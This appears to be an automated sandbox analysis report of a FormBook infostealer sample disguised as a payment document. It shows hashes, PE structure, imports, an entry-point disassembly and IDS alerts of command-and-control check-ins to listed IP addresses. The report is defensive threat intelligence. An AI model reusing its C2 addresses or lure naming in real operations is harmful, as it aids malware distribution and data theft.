	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	199.192.23.123
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	63.250.43.134
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	198.54.116.108
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	63.250.43.134
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	63.250.43.134

Process:	C:\Windows\SysWOW64\w32tm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sheitan

Download File

Process:	C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994361421522106
Encrypted:	true
SSDEEP:	6144:aHiafm8BppDk1jvCnV35aitbYGbp31IyiL4TDPASfy4xC43zN3OQiJTX7d:UJm8ppc6nV355FY61Iy8yDPASfns4e9L
MD5:	4244C57DE65846CBC38A8579430776CF
SHA1:	A4CC6222B2CD4F856D19760BD45F196393176247
SHA-256:	9B77EE6D9A457BA5383BCA189944E5C7EA15A092B7ABA94269F7C538B62F2981
SHA-512:	40DCE4B68F3CD5C8F8F88DBDA9A6D5E4C2953F19C402BE8531417F25DD73DC7EE5A7FF94F49544C42F43F9EAFDEC56E15CD6049D468473721FB73DF2288ABBE2
Malicious:	false
Reputation:	low
Preview:	...X;GHYC317..PY.GBGMAQW.TNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317.XPY9X.IM.X.f.O..f.1.@.G$77+V*b$,/?83t,=.5=7gZ_....yZ(&"cL\]cTNX8GHY>28.k87..'%.p!6.]...'/.]...j87.-..q!6..=-0.'/.G317VXPYg.BG.@PW.C..8GHYG317.XRX<FIGM.UWGTNX8GHYg'17VHPY77FGMA.WGDNX8EHYA317VXPY1GBGMAQWG$JX8EHYG317TX..7GRGMQQWGT^X8WHYG317FXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWi + LGHYcd57VHPY7.FGMQQWGTNX8GHYG317vXP97GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.421928507256506
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
File size:	1'619'968 bytes
MD5:	24516ed0bcff1bb18dd58da6b6919c3e
SHA1:	760d5c65217102892caf3d6313ab3edc7a8548fa
SHA256:	3bc8146fb4903843798975abff071ddbe0b44769e5f6f8ed4850c17daf5c71c8
SHA512:	3caa4a6b69db0970670c33f120cee8748bb1c443fdc0cfc6a54fe0bf9ee82d331f546d9f578bea5914fcf9a36d7aee9fe2fd0f093a25cb7ddcbdf2f80311e4d5
SSDEEP:	24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8aTQp4vJZmJLAwKyiJr7i90P/iy8o1s:OTvC/MTQYxsWR7aTQpsXwKlr7iKyx
TLSH:	C075D00273D1D062FFAB92334B5AF61157BC69260123E61F13A81DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67801F1C [Thu Jan 9 19:10:20 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F2E753E3B93h
jmp 00007F2E753E349Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F2E753E367Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F2E753E364Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F2E753E623Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F2E753E6288h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F2E753E6271h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb4d50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x189000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb4d50	0xb4e00	eeb309fc42a2ddd95e87d35f0677bbbe	False	0.9638975574464409	data	7.962981146145774	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x189000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xac018	data			1.0003136816287599
RT_GROUP_ICON	0x1887d0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x188848	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x18885c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x188870	0x14	data	English	Great Britain	1.25
RT_VERSION	0x188884	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x188960	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T10:19:31.792823+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49736	199.59.243.228	80	TCP
2025-01-13T10:19:31.792823+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49736	199.59.243.228	80	TCP
2025-01-13T10:19:55.501146+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49779	104.21.13.141	80	TCP
2025-01-13T10:19:58.027663+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49795	104.21.13.141	80	TCP
2025-01-13T10:20:00.595689+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49812	104.21.13.141	80	TCP
2025-01-13T10:20:03.318941+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49832	104.21.13.141	80	TCP
2025-01-13T10:20:03.318941+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49832	104.21.13.141	80	TCP
2025-01-13T10:20:10.033463+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49868	15.197.240.20	80	TCP
2025-01-13T10:20:11.527719+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49884	15.197.240.20	80	TCP
2025-01-13T10:20:15.114687+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49896	15.197.240.20	80	TCP
2025-01-13T10:20:17.601041+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49916	15.197.240.20	80	TCP
2025-01-13T10:20:17.601041+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49916	15.197.240.20	80	TCP
2025-01-13T10:20:23.330918+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49957	136.243.225.5	80	TCP
2025-01-13T10:20:25.888137+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49977	136.243.225.5	80	TCP
2025-01-13T10:20:28.783179+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49994	136.243.225.5	80	TCP
2025-01-13T10:20:31.291950+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50010	136.243.225.5	80	TCP
2025-01-13T10:20:31.291950+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50010	136.243.225.5	80	TCP
2025-01-13T10:20:36.981692+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	104.21.18.171	80	TCP
2025-01-13T10:20:39.553568+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50018	104.21.18.171	80	TCP
2025-01-13T10:20:42.087545+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	104.21.18.171	80	TCP
2025-01-13T10:20:44.644673+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50020	104.21.18.171	80	TCP
2025-01-13T10:20:44.644673+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50020	104.21.18.171	80	TCP
2025-01-13T10:20:50.329479+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	199.192.21.169	80	TCP
2025-01-13T10:20:52.838344+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50022	199.192.21.169	80	TCP
2025-01-13T10:20:55.455625+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	199.192.21.169	80	TCP
2025-01-13T10:20:57.941444+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50024	199.192.21.169	80	TCP
2025-01-13T10:20:57.941444+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50024	199.192.21.169	80	TCP
2025-01-13T10:21:03.831033+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	45.130.41.107	80	TCP
2025-01-13T10:21:06.369860+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	45.130.41.107	80	TCP
2025-01-13T10:21:08.914520+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	45.130.41.107	80	TCP
2025-01-13T10:21:11.478583+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50028	45.130.41.107	80	TCP
2025-01-13T10:21:11.478583+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50028	45.130.41.107	80	TCP
2025-01-13T10:21:18.348878+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	85.159.66.93	80	TCP
2025-01-13T10:21:20.897525+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	85.159.66.93	80	TCP
2025-01-13T10:21:23.458253+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	85.159.66.93	80	TCP
2025-01-13T10:21:25.172684+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50032	85.159.66.93	80	TCP
2025-01-13T10:21:25.172684+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50032	85.159.66.93	80	TCP
2025-01-13T10:21:30.895681+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	199.59.243.228	80	TCP
2025-01-13T10:21:33.452280+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50034	199.59.243.228	80	TCP
2025-01-13T10:21:36.131921+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	199.59.243.228	80	TCP
2025-01-13T10:21:38.712173+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50036	199.59.243.228	80	TCP
